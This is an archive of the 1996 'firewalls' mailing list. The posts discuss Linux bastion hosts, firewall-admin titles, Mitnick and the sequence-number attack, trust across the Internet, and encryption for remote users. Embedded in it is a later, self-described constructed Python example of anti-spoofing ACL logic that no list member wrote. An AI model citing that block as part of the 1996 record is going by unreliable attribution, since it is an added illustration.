A story, perhaps legend, passed on to me by my security officer when I was still a part of the MIC: Fellow who has long been waiting for his clearance walks into the local bar, sees his buddies, and hollers, "I'm SECRET, I'm SECRET!". Next day he wasn't. -- Del Merritt del@IntraNet.com IntraNet, Inc., One Gateway Center #700, Newton, MA 02158 Voice: 617-527-7020; FAX: 617-527-6779 Just say no to Clipper. Want to buy my house or car? email me for details! From firewalls-owner Fri Jan 12 08:29:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21589 for firewalls-outgoing; Fri, 12 Jan 1996 08:17:37 -0800 (PST) Received: from nav.cc.tx.us (nav.cc.tx.us [192.152.226.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21584 for ; Fri, 12 Jan 1996 08:17:31 -0800 (PST) Received: by nav.cc.tx.us (AIX 3.2/UCB 5.64/4.03) id AA61778; Fri, 12 Jan 1996 10:20:14 -0600 Date: Fri, 12 Jan 1996 10:20:14 -0600 (CST) From: Dana Brewer To: firewalls@greatcircle.com Subject: Linux as a firewall Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've noticed that a lot of people say they use Linux as part of their Internet firewall. But now I've had a company tell me that Linux isn't a true multi-tasking operating system, so it shouldn't be used as a firewall. What's the true story here? Ideally, in our situation, the bastion host would be the firewall, the WWW server, the ftp server, the Usenet news server, etc... Is this completely unrealistic? ************************************************************************** Dana Brewer Director, Computer Center Internet: dana@nav.cc.tx.us Navarro College Phone : 903-874-6501 3200 W. 7th Ave. FAX : 903-874-4636 Corsicana, TX 75110 All opinions stated are my own, and probably don't even vaguely resemble those of Navarro College. 
:) ************************************************************************** From firewalls-owner Fri Jan 12 08:38:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19702 for firewalls-outgoing; Fri, 12 Jan 1996 07:31:14 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19686 for ; Fri, 12 Jan 1996 07:30:56 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 064128100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:26:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #17" sent on 1/12/96 8:52AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 08:44:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21038 for firewalls-outgoing; Fri, 12 Jan 1996 08:05:51 -0800 (PST) Received: from freebsd.netcom.com (freebsd.netcom.com [198.211.79.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21005 for ; Fri, 12 Jan 1996 08:05:44 -0800 (PST) Received: by freebsd.netcom.com (8.6.12/SMI-4.1) id KAA03301; Fri, 12 Jan 1996 10:10:43 -0600 From: bugs@freebsd.netcom.com (Mark Hittinger) Message-Id: <199601121610.KAA03301@freebsd.netcom.com> Subject: Re: "Title for Firewall Admin? (fwd) To: firewalls@greatcircle.com Date: Fri, 12 Jan 1996 10:10:43 -0600 (CST) X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: Frederick M Avolio > But I can see, eventually, a need for a well known different term. 
> Gee, another thing for the Firewall Product Developers Consortium to talk > about. :-) Quick... get famous. Suggest a standard! > "gatekeeper" is a fun possibility. "doorman" is too plain. How about bouncer? Cheers! Mark Hittinger Netcom/Dallas bugs@freebsd.netcom.com msh@freebsd.org From firewalls-owner Fri Jan 12 08:59:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA22034 for firewalls-outgoing; Fri, 12 Jan 1996 08:35:47 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id IAA22029 for ; Fri, 12 Jan 1996 08:35:43 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id KAA05344 for GreatCircle.COM!firewalls; Fri, 12 Jan 1996 10:12:21 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA25569; 12 Jan 96 10:39:33 CST (Fri) Received: by sonic.nmti.com; id AA00409; Fri, 12 Jan 1996 10:10:50 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601121610.AA00409@sonic.nmti.com.nmti.com> Subject: Re: "Title for Firewall Admin? To: billcurr@cyberspace.com (Bill Curr) Date: Fri, 12 Jan 1996 10:10:49 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Bill Curr" at Jan 11, 96 04:04:55 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? "masochist"? (remember... 
down, not across) From firewalls-owner Fri Jan 12 09:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA22079 for firewalls-outgoing; Fri, 12 Jan 1996 08:36:56 -0800 (PST) Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA22074 for ; Fri, 12 Jan 1996 08:36:48 -0800 (PST) Received: from haddock.saa-cons.co.uk by smtpgate.saa-cons.co.uk with SMTP (5.65/1.3-eef) id AA17681; Fri, 12 Jan 96 15:52:30 GMT Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) id AA54191; Fri, 12 Jan 1996 15:52:29 GMT Date: Fri, 12 Jan 1996 15:52:28 +0000 (GMT) From: Dave Roberts To: firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? In-Reply-To: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Frederick M Avolio wrote: > Gee, another thing for the Firewall Product Developers Consortium to talk > about. :-) Quick... get famous. Suggest a standard! > > "gatekeeper" is a fun possibility. "doorman" is too plain. firechief ? Why not continue the analogy, as bad as it may be :) Actually, I think Brent's suggestion was the best one so far. - Dave. 
From firewalls-owner Fri Jan 12 09:29:15 1996
Date: Fri, 12 Jan 1996 11:22:51 -0500 (EST)
From: Tom Zerucha
Reply-To: zerucha@shell.portal.com
To: Bill Curr
cc: firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?

On Thu, 11 Jan 1996, Bill Curr wrote:
>
> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?
> And is there a list of these colorful "nom de nets" anywhere?
> -Thanks
> Bill
>
>

castelian

zerucha@shell.portal.com
finger zerucha@jobe.portal.com for PGP key

From firewalls-owner Fri Jan 12 09:33:43 1996
Date: 12 Jan 1996 10:28:10 EST
From: "Administrator"
To: Firewalls@GREATCIRCLE.COM
Subject: Message not deliverable

Status Distribution

The message regarding "Firewalls-Digest V5 #18" sent on 1/12/96 4:43AM was addressed to the following invalid recipients.

Robert Matson at ~PHSSEA

Please consult your cc:Mail Administrator.

From firewalls-owner Fri Jan 12 09:53:00 1996
Date: Fri, 12 Jan 1996 15:42:15 -0800 (PST)
From: "Todd S. Aven"
To: firewalls@greatcircle.com, bind-users@vix.com
Subject: patches for bind-4.9.3-REL to support 'noforward' directive

The patches to support the 'noforward' directive in the named.boot configuration file are available by anonymous FTP at:

ftp://ftp.is.co.za/networking/ip/dns/bind/contrib/noforward.tar.gz

As a reminder, these patches allow you to support normal delegation on a nameserver that is configured with 'forwarders'. Without these patches, delegation records for zones not held locally are always ignored if there is a 'forwarders' directive.

Thanks to Andras Salamon (andras@is.co.za) for providing space on his server.

Cheers,
Todd.Aven@BankersTrust.Com

From firewalls-owner Fri Jan 12 09:54:23 1996
Date: Fri, 12 Jan 1996 11:26:43 +0000
From: "Bob Resino"
Reply-to: pnh1rgr@mclo10.med.navy.mil
To: Ron DuFresne
CC: firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (

> Date: Thu, 11 Jan 1996 11:50:54 -0600 (CST)
> From: Ron DuFresne
> To: Brain21
> Cc: Doug Hughes , firewalls@GreatCircle.COM
> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)

SNIP

> Agreed, either we have here an extreme case of over-confidence,
> misconfiguring by others really doing the security, or good old Mitnick
> was 'invited' in a case bordering on entrapment. Seems very strange in
> either way, seems strange if not an outright blunder.
>
> Later,
>
> Ron Dufresne
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
>
> OK, so you're a Ph.D. Just don't touch anything.

Ron,

In some states, there is no such thing as "Entrapment". Such is the case in the Commonwealth of Virginia. One simple warning screen like the CERT P.L. 98-473 warning would preclude any claim of entrapment.

Bob Resino

Bob Resino (RGR24)      Head, MID/Data-telecommunications
804-398-7400 x322       MCLO, HSO, Norfolk, VA (US Navy)
Fax 804-398-7265        pnh1rgr@mclo10.med.navy.mil

From firewalls-owner Fri Jan 12 09:54:42 1996
Date: 12 Jan 1996 10:28:10 EST
From: "Administrator"
To: Firewalls@GREATCIRCLE.COM
Subject: Message not deliverable

Status Distribution

The message regarding "Firewalls-Digest V5 #15" sent on 1/12/96 6:44AM was addressed to the following invalid recipients.

Robert Matson at ~PHSSEA

Please consult your cc:Mail Administrator.

From firewalls-owner Fri Jan 12 09:56:27 1996
Date: 12 Jan 1996 10:28:10 EST
From: "Administrator"
To: Firewalls@GREATCIRCLE.COM
Subject: Message not deliverable

Status Distribution

The message regarding "Firewalls-Digest V5 #22" sent on 1/12/96 4:06AM was addressed to the following invalid recipients.

Robert Matson at ~PHSSEA

Please consult your cc:Mail Administrator.

From firewalls-owner Fri Jan 12 09:58:57 1996
Date: Fri, 12 Jan 1996 10:20:10 -0600
From: ray@rayk.com (Ray Kaplan)
To: Firewalls@GreatCircle.COM
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (Long)

...
> My personal opinion is either 2 or 3. Has anyone on the list actually
> discussed this with him? I would be interested in his side, since we all
> really only have part of the story. Anyone?
...

Oh, what the hell. I can't resist. 'sides that, one of my friends just got hammered by such an attack.

**Warning** The following may simply be mindless babble.

Besides, the BEST news of the day is the fact that Philip Zimmermann "will not be prosecuted in connection with the posting to USENET in June 1991 of the encryption program Pretty Good Privacy. The investigation is closed." (Extracted from a post to cypherpunks@toad.com.)

re: Kevin Mitnick questions

I think that the current spate of books, media, movies and such will preclude such a detailed, personal conversation with Kevin for a while. However, here is my plan:

- Someone(s) puts some money on the table (needed to get past the current noise level from the people / orgs that are bidding for this)

- I'll put together a plan to interview Kevin (et al - including some of the folks who rode the coat tails of those who are *apparently* responsible for the various happenings), and then present it to the powers that be in the current game (agents in Hollywood and lawyers in LA and Kevin).

- I propose a pay-for-view audio teleconference wherein an honest broker would moderate. I'd be happy to do this based on my previous experience with interviewing Kevin in such a venue (I have tapes of that 1993 teleconference for sale - note: part of the $ from any sales of those tapes goes to Kevin since I have a royalty deal with him for the effort.) No attempt at commercialism here, I'll never even recover my losses on this project.

- Such a conference would be cheap (funded by telecom expenses of attendees), permit everyone to get their questions answered, *and* (perhaps, most importantly) allow Kevin (et al) to speak his / their mind(s) freely - *AND* NOT be the usual, mindless talk show junk.

- Revenues from such a conference would defray its costs, offer Kevin (et al) something for his / their time, and be put toward some form of information distribution that would smarten everyone up.

What has prevented me from doing this already?

When Kevin and Lenny attacked DEC and were done with the initial mess in 1988 (after successfully stealing the source code for version 5 of VMS from DEC *across the net* before it shipped), Robert Clyde (Axent Technologies) and I invented a conference session called History of Recent Computer Break-ins in the DECUS (DEC user group) Symposium context. In that presentation, we featured (as one case study) the DEC case. As things played out, I struck up a relationship with Kevin (at his instigation since someone told him I wanted to talk to *HIM*, I think) in 1990. The result of this was Kevin's willingness to talk publicly about the DEC deal at the 1990 U.S. DECUS Fall Symposium.

DEC, DECUS, and - in no small measure - *my peers* - slapped me silly as a reward for my effort to take advantage of Kevin's willingness to talk publicly. Besides a first order hit on my career, the fallout from this little deal contributed significantly to my 1993 personal bankruptcy. I'm still reeling from *THAT* disaster. Also, my 15 minutes of fame on the net came as a result of this episode (I was immortalized in the signature lines of people who were sucked into the that erupted on comp.os.vms during those days.)

If anyone is interested (and I can get past my shaky hands) I'll put the history of this, and the current version of History of Recent Computer Break-ins presentation up on www.rayk.com/rayk sometime soon. There is a rumor afoot that DECUS is making the handouts available: consult www.decus.org for pointers to the effort. Meantime, if you want a hard copy of the History of Recent Computer Break-ins presentation, I suggest that you look at www.axent.com. I don't have the resources to get this to you at the moment, but Rob and our trusty watchdog / helper Becky Hasson tells me that Axent will make hard copy of the presentation available at www.axent.com as soon as the Axent office on the East coast digs out from the snow cover (1/15/96?).

Hence, someone(s) gotta write some substantial checks (not to me) this time around - I have no more to donate to trying to smarten people up about certain things such as the facts about Kevin. As a consultant / trainer / speaker, I have my hands full with the spate of people who don't seem to want to hear that their use of today's TCP is simply *not correct*.

Frankly, folks. By the time all of this becomes known (if it ever does), we all will get our attitudes adjusted. The answers to the questions that are being asked (and more that will be asked) will hardly leave anyone comfortable. Or is it that you believe that all of the plea bargains are some sort of magic?

Until then, I suggest:

- Anyone who wants to apply some pressure to get Kevin's story out should contact one of the only "honest brokers" that I have had personal experience with in this matter: journalist Joe Panateri @ InformationWeek magazine. A few notes to his editor would go a long way to getting him the franchise he needs to get some (more) work done on this. Choosing Joe Panateri as a focus also will allow the whole story to get displayed to CIOs and others who (so far) *still* don't seem to get it: you gotta get serious about this security stuff and *spend resources* on it!

- Stay away from the Wall Street Journal - their "hacker reporter" (Sandler?) seems to have no idea of the real issues that are on the table and displays personal enmity towards me when I try to answer his questions about them.

- Support the Washington Post and their apparent willingness to allow honest brokers to ask hard questions about all of this.

- Apply some intelligence to this - demand accurate reporting, detailed technical analysis and factual answers to the hard questions that are on the table

- Insist (no, you can't demand) that people - especially those in power (e.g., CIOs) *stop* trying to treat security as "just another bunch of technical detail."

- Insist (no, you can't demand) that people - especially those in power (e.g., CEOs) understand that infrastructure security is - perhaps - *THE* issue upon which everything else depends. Or, is it that you believe that you can really get through the current paradigm shifts without being able to trust your systems and networks?

Mumble, mumble...

Would someone please cross post this to other appropriate forums? My hands shake badly when the reality of my last involvement in this stuff reminds me how deep the wounds were.

RayK 8)

Ray Kaplan Security Services - P.O Box 23210 - Richfield, MN USA 55423
(612) 861-7198 - FAX (612) 861-3736 - www: http://www.rayk.com/rayk
ray@rayk.com - Not an expert, just a battered vet.

From firewalls-owner Fri Jan 12 10:14:16 1996
Date: 12 Jan 1996 10:28:10 EST
From: "Administrator"
To: Firewalls@GREATCIRCLE.COM
Subject: Message not deliverable

Status Distribution

The message regarding "Firewalls-Digest V5 #13" sent on 1/12/96 4:37AM was addressed to the following invalid recipients.

Robert Matson at ~PHSSEA

Please consult your cc:Mail Administrator.

From firewalls-owner Fri Jan 12 10:15:46 1996
Date: 12 Jan 1996 10:22:10 EST
From: "Administrator"
To: Firewalls@GREATCIRCLE.COM
Subject: Message not deliverable

Status Distribution

The message regarding "Firewalls-Digest V5 #19" sent on 1/11/96 11:08PM was addressed to the following invalid recipients.

Robert Matson at ~PHSSEA

Please consult your cc:Mail Administrator.

From firewalls-owner Fri Jan 12 10:23:24 1996
Date: Fri, 12 Jan 1996 10:51:54 EST
From: gblolmxb@ibmmail.com
To: firewalls@greatcircle.com
Subject: Lotus Notes' Internotes Web Navigator

On 13/12/95 (or 12/13/95 for those of you in the colonies), Lotus announced the integration of their Internotes Publisher product with soon-to-be-released Notes 4. They also announced Web navigator software for the Notes client.

Has anyone got any other info on this? Such as:

o how are HTML retrieve requests routed through a Notes infrastructure to the Notes server
o What sort of security is provided at the Notes server, e.g. is a separate firewall needed between the ISP line & the Server?
o Are FTP & SMTP links in web pages supported?
o Has anyone 'seen' it working?

Mark blackman
gblolmxb@ibmmail.com

From firewalls-owner Fri Jan 12 10:23:51 1996
Date: Fri, 12 Jan 1996 09:34:59 -0600 (CST)
From: Phil Howard
To: billcurr@cyberspace.com (Bill Curr)
Cc: firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?

Bill Curr writes...

> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?
> And is there a list of these colorful "nom de nets" anywhere?

No idea. I just thought up: "netsentry"

--
Phil Howard KA9WGN   +-------------------------------------------------+
Linux Consultant     | The enemy of my enemy is NOT my friend...       |
Milepost Services    |              ...but he is a convenient ally!    |
phil@milepost.com    +-------------------------------------------------+

From firewalls-owner Fri Jan 12 10:28:09 1996
Date: Fri, 12 Jan 1996 11:02:04 -0500 (EST)
From: "Jay R. Clark"
To: David Loysen
cc: firewalls@GreatCircle.COM
Subject: Re: Allow SSL through a firewall?

> Maybe lurking around on this list is making me paranoid....... But why not
> put the WWW server and whatever data you want the world to see outside the
> firewall. Isn't it cheaper to duplicate the non-secure data outside the

**off**

Ummm you can leave a sacrificial machine out on the net, with a policy that sez "who cares, we have it all backed up". In our case we accumulate data from callers for our clients, the data is confidential/proprietary, if we leave it out on the sacrificial machine we run the risk of letting 4th parties obtain it and create one hella liability problem for ourselves and for our clients.

**on**

From firewalls-owner Fri Jan 12 10:28:24 1996
Date: Fri, 12 Jan 96 10:45:25 EST
From: "Jim Meritt"
To: Brain21
Cc: firewalls@GreatCircle.COM, bens@archimedes.vislab.navy.mil
Subject: Re[4]: Mitnick & the TCP Sequence Number Attack on Shimo

Tough when you try to impress folks (with that classification nonsense) and reality intrudes. Do you often go waving red flags to attract people's attention to places? Maybe you also assisted in the naming of hackers.com?

Amazed at childishness. Enough, already.

Jim Meritt

______________________________ Reply Separator _________________________________
Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimo
Author: Brain21 at SMTPINET
Date: 1/12/96 3:20 AM

On Thu, 11 Jan 1996, Jim Meritt wrote:

> Concur. DISNET yes. Internet no.
>
> Unless maybe you/he WANT him arrested....
>
> Or maybe he was just spinning a tale and you fell for it. Or maybe he
> just didn't understand how it was working.

1) I was NOT spinning a tale
2) I DON'T want my father arrested (for WHAT? Pray tell?)
3) I never mentioned that classified info was sent over the net. Read more carefully before making assumptions.

As I stated in my follow-ups (which really should not have even been necessary. C'mon some of you assume and infer WAY too much!!!!) I said that he had top secret clearance. I said that the company that he worked for (a DoD subcontractor) kept in touch w/ its other offices over the net. I said that they did not use encryption. I inferred that netcom was not secure. I said that I was not allowed to know his email address (company policy) (that's why I got him one plus a butload of software for Christmas a year ago).

Now, please show me where I stated that he or his company did, in fact, send ANY classified documents over the net! Guess what? You can't! Cause I never said that! You just assumed that that was what I meant. I said in follow-up posts that it was, in fact, possible for someone to perhaps mention something by accident (BTW, I never said that that did happen, I just mentioned that the possibility was there) just like that OTHER poster had mentioned. I alluded to the fact that *I* thought that the mere possibility of someone inadvertently saying something was there, and that I thought that in and of itself was insecure. I thought that they should have had NO net connection, at least in the capacity that they did have it. My point was that security is NOT the first thing on everyone's mind, even when it sometimes should be.

Now, take these posts and try to get him arrested. Let me know when the lawyers stop laughing at the evidence that you present because it is comprised purely of assumptions and conjecture (and any other redundancies that you can think of).

I don't mean for these comments to sound snide, but c'mon. Get real, and stop interpreting what you THINK someone said, especially when you say such inane things as "unless you/he WANT him arrested"!!!!

Sorry about the bandwidth on this one. I consider this issue dead because of what it has become, and how many completely missed my point to begin with (though not all).

Chuckling in amazement,
Brain21

From firewalls-owner Fri Jan 12 10:38:32 1996
Date: Fri, 12 Jan 1996 09:00:10 -0800 (PST)
From: Brian Murrell
To: firewalls@greatcircle.com
Subject: securid and wu-ftp

Hi Folx,

Anybody know of any patches to have wu-ftpd use securid for access?? The ACE ftp server is just too featureless for some work we need to do.

b.
--
Brian J. Murrell                     murrell@bctel.net
BCTel Advanced Communications        brian@ilinx.com
Vancouver, B.C.                      brian@wimsey.com
604 454 5261

From firewalls-owner Fri Jan 12 10:42:23 1996
Date: Fri, 12 Jan 1996 10:43:29 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Subject: Trust across I-net

I rote:
> Is easy also to make the first line in your firewall ACL "Deny incoming
> ". Belt and suspenders are good 8*).

Brent wresponded:
> Note that this only keeps the spoofers from masquerading as a machine with
> one of your IP addresses. If you trust things at other sites, with other
> IP addresses, the rule Padgett mentions doesn't keep the spoofers from
> masquerading as those trusted things at other sites.

If you are extending "trust" in the clear over the Internet to sites out of your control, better keep your resume updated.

I have three classes of nets/subnets - "Internal" e.g. controlled, "Untrusted" e.g. anything directly connected to the Internet, and "Limited Exposure" such as dedicated PNS links or encrypted Internet connections to customers/suppliers with whom we have a formal agreement and is limited to specific nodes/subnets.

The conditions that Brent describes as necessary for such activity, I do not consider acceptable (not saying such do not exist, just that I am actively trying to eliminate them - not an easy task when the mergers seem to be hitting daily and this is at a "guns and dogs" corp., must be a nightmare in the commercial world).

Warmly,
Padgett

From firewalls-owner Fri Jan 12 10:44:17 1996
Date: Fri, 12 Jan 1996 10:30:29 -0700
From: Shawn Steele
To: Firewalls@greatcircle.com
Subject: Re: "Title for Firewall Admin?

> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?

Firemaster?
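Padgett's first ACL line ("Deny incoming" for your own address space), Brent's caveat that it does nothing for trust extended by address to hosts at other sites, and Padgett's three net classes, worked through as an added example. This is not code from any post on the list or from any firewall product; the address ranges, the interface names ("outside", "partner_link", "inside"), the Packet shape and the sample traffic are all constructed for the illustration. The policy goes a step beyond Padgett's one line: it ties "Limited Exposure" trust to the controlled link rather than to the partner's address, so the gap Brent points at is closed by refusing, not trusting, a partner address seen on the cleartext path.

```python
import ipaddress
from dataclasses import dataclass

# Constructed sample address plan (assumptions for the example, not from the
# list).  Padgett's three classes: "Internal" (controlled), "Limited Exposure"
# (a partner reached only over a dedicated or encrypted link) and "Untrusted"
# (everything else on the Internet).
INTERNAL_NETS = [ipaddress.ip_network("192.0.2.0/24")]
PARTNER_NETS = [ipaddress.ip_network("198.51.100.0/28")]


@dataclass(frozen=True)
class Packet:
    """Assumed shape of what the filter sees: arrival interface plus addresses."""
    iface: str  # "outside" (cleartext Internet), "partner_link" (encrypted/dedicated), "inside"
    src: str
    dst: str


def address_class(addr: str) -> str:
    """Map a source address onto Padgett's three classes."""
    ip = ipaddress.ip_address(addr)
    if any(ip in net for net in INTERNAL_NETS):
        return "internal"
    if any(ip in net for net in PARTNER_NETS):
        return "partner"
    return "untrusted"


def padgett_rule(pkt: Packet) -> str:
    """Padgett's first ACL line on its own: deny anything arriving from the
    Internet that claims one of our own addresses as its source."""
    if pkt.iface == "outside" and address_class(pkt.src) == "internal":
        return "deny"
    return "pass"


def classify(pkt: Packet) -> str:
    """Full policy: Padgett's line plus the consequence of Brent's caveat.
    Returns 'deny:<reason>' or 'accept:<trust level>'."""
    src_class = address_class(pkt.src)
    if padgett_rule(pkt) == "deny":
        return "deny:spoofed-internal-source"
    if pkt.iface == "outside":
        if src_class == "partner":
            # Brent's point: the first line lets this through, and nothing on a
            # cleartext path proves the source is genuine.  Since the partner is
            # only ever reached over its own link, a partner address on the raw
            # Internet side is itself wrong; refuse it rather than trust it.
            return "deny:partner-address-on-cleartext-path"
        return "accept:untrusted"
    if pkt.iface == "partner_link":
        # Trust follows the controlled link, not the address; anything else
        # arriving over it indicates a misconfiguration or a leak.
        if src_class == "partner":
            return "accept:limited-exposure"
        return "deny:unexpected-source-on-partner-link"
    if pkt.iface == "inside":
        # Belt and suspenders: our own hosts never emit foreign source addresses.
        if src_class == "internal":
            return "accept:internal"
        return "deny:spoofed-egress-source"
    return "deny:unknown-interface"


# Constructed sample traffic, one packet per case the policy distinguishes.
SAMPLES = [
    ("outside, claims an internal address", Packet("outside", "192.0.2.10", "192.0.2.1")),
    ("outside, claims a partner address", Packet("outside", "198.51.100.5", "192.0.2.1")),
    ("outside, ordinary Internet host", Packet("outside", "203.0.113.9", "192.0.2.1")),
    ("partner link, genuine partner", Packet("partner_link", "198.51.100.5", "192.0.2.1")),
    ("partner link, stray address", Packet("partner_link", "203.0.113.9", "192.0.2.1")),
    ("inside, foreign source", Packet("inside", "203.0.113.9", "203.0.113.1")),
]


def run_samples() -> list:
    """Return (description, first-line-only verdict, full-policy verdict) per sample."""
    return [(desc, padgett_rule(p), classify(p)) for desc, p in SAMPLES]


if __name__ == "__main__":
    for desc, first, full in run_samples():
        print(f"{desc:40s} first line: {first:5s} full policy: {full}")
```

The second sample is the one Brent is talking about: `padgett_rule` passes it, because the source is not one of our own addresses, while `classify` drops it. That second verdict is only sound under Padgett's definition of "Limited Exposure", where the partner is reached solely over a dedicated or encrypted link; if partner traffic can legitimately arrive in the clear, no address-based rule can tell the real partner from a spoofer, which is exactly Padgett's "keep your resume updated" point.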
From firewalls-owner Fri Jan 12 10:47:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA20215 for firewalls-outgoing; Fri, 12 Jan 1996 07:45:49 -0800 (PST) Received: from portia.merrillcorp.com ([205.139.50.23]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA20209 for ; Fri, 12 Jan 1996 07:45:42 -0800 (PST) From: jeff.aldrich@merrillcorp.com Received: from vpn by merrillcorp.com (PMDF V5.0-5 #13734) id <01HZX2SEZJ808WW27X@merrillcorp.com> for firewalls@greatcircle.com; Fri, 12 Jan 1996 09:46:19 -0600 (CST) Received: from ccinternet.mrll.com by vpn.stp.mrll.com (PMDF V5.0-5 #13735) id <01HZX2RY5I3K94FG2L@vpn.stp.mrll.com> for firewalls@greatcircle.com; Fri, 12 Jan 1996 09:45:19 -0600 (CST) Date: Fri, 12 Jan 1996 09:46 -0600 (CST) Subject: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura To: firewalls@greatcircle.com Message-id: <01HZX2RY8G7694FG2L@vpn.stp.mrll.com> MIME-version: 1.0 Content-type: TEXT/PLAIN Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A couple of people have mentioned that Mitnick may have been "invited" and what therefore entraped. Maybe I'm missing something, but I don't necessarily see how having something left either intentionally or unintentionally vulnerable constitutes invititation to do damage. Seems to me like a burglar claiming entrapment because you invited him/her to steal things when you forgot to lock the door. I think entrapment entails actively enticing someone to engage in specific illegal activity. Cops posing as prostitutes to catch customers, if done correctly, isn't entrapment. On the other hand, had Mr. Shimomura posted messages all over the Internet saying "Kevin Mitnick is a lamer, who couldn't crack an egg!" it might be a different story! 
;-) (humor alert)

From firewalls-owner Fri Jan 12 10:52:32 1996
Date: Fri, 12 Jan 1996 12:11:35 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960112121135.20203704@hobbes.orl.mmc.com>
Subject: re: Encryption export laws from US.

Barry writes:

> Firewall to Firewall encryption is great, but when you have nomadic
> remote users and small international offices individual access gets
> important for a lot of folks. Plus, some countries now seem to have more
> reliable Internet access than private voice/data line access...

This is a proper problem (last year had a major one connecting to an office
near the Nile. International modem connection was very chancy so wound up
using a local trunk provider. Problem then became the *local* dial-up
connection) for the list.

A year ago, the practical answer (for offsite employees who did not know what
to do with a command line) was encrypting modems. This is still a good answer
for brane-dead use but an expensive one.

Today, the ease-of-use of software based encryption mechanisms such as
ViaCrypt's "Enclyptor" floating toolbar is markedly improving.

Of course the best answer will be secure channels such as created by Netscape
commerce servers migrating to the desktop->firewall connection. Is going to
happen, hopefully soon (may need a proxy host on a bastion). I figure that in
less than a year this will be common practice since it is easier to do for
all connections than for some of them.

Warmly, Padgett

From firewalls-owner Fri Jan 12 10:56:00 1996
Date: Fri, 12 Jan 1996 11:55:29 -0500 (EST)
From: Brain21
To: "Marcus J. Ranum"
cc: firewalls@greatcircle.com
Subject: Re: Firewalls-Digest V5 #16
In-Reply-To: <199601111500.KAA12166@switchblade.v-one.com>

I would have responded privately since this really is not of great importance
to the list, but at this point, I think that levity is definitely a GOOD
THING. Everyone take a DEEP breath, and RELAX. It's only email. :)

On Thu, 11 Jan 1996, Marcus J. Ranum wrote:

> I'll tell you the secret, if you promise not to spread
> it around. :)

None but the whole list knows :)

> it. Data crosses the air gap on floppies, when it has to, which is
> b) I only seldom need to transfer data between the
> Windows PC and the Internet, and when I do it
> is important stuff so having a spare copy on
> a floppy is a Good Thing.
> c) Swapping floppies is technically gross and someone
> may laugh at me, but I can live with that.

Sneaker-net is wonderful. No snooping, and no encryption needed. No need to
worry about sequence numbers (just walk "serpentine" from one machine to the
other. That'll confuse everyone to the tune of 'why does he walk like
that?') ;)

> e) I can't afford a firewall, and don't know how to
> build one.

????? :)

> control and who knows someone might think it was all
> an NSA conspiracy. [Which is patent nonsense, since
> I work for the KGB, not NSA]

